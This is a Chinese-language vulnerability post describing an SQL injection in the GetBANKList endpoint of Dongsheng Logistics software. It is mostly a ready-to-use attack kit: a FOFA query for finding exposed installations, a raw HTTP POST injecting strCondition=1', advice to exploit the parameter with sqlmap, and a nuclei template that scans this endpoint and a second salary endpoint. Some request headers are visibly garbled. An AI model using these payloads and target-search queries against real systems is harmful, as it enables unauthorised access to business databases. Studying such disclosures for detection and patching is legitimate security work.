东胜物流 GetBANKList SQL注入
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
东胜物流的/MvcShipping/MsBaseInfo/GetBANKList接口存在SQL注入
影响版本:
FOFA:
app="东胜物流软件-物流软件"POC:
POST /MvcShipping/MsBaseInfo/GetBANKList HTTP/1.1
Host:
Content-Type: application/x-!""-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Length: 456
strCondition=1'可以使用SQLmap对strCondition参数进行利用
nuclei POC:
id: dongshengwuliu-sqli-getbanklist
info:
name: SQL Injection in GetBANKList Endpoint
author: ProjectDiscoveryAI
severity: medium
description: |
This template checks for a potential SQL Injection vulnerability in the GetBANKList and GetDataList_Salary endpoints of the application.
The injection is tested by sending payloads in POST requests to the respective endpoints.
tags: sql-injection
http:
- raw:
- |
POST /MvcShipping/MsBaseInfo/GetBANKList HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Length: 38
strCondition=1'
- |
POST /TruckMng/MsWlDriver/GetDataList_Salary?_dc=1665626804091&start=0&limit=30&sort=&condition=1*&page=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Length: 16
strCwSTARTGID=1'
matchers-condition: and
matchers:
- type: status
status:
- 500
- 200
- type: regex
regex:
- "SQL syntax"
- "unexpected end of SQL command"
- type: word
words:
- "error"
part: body
没有回复内容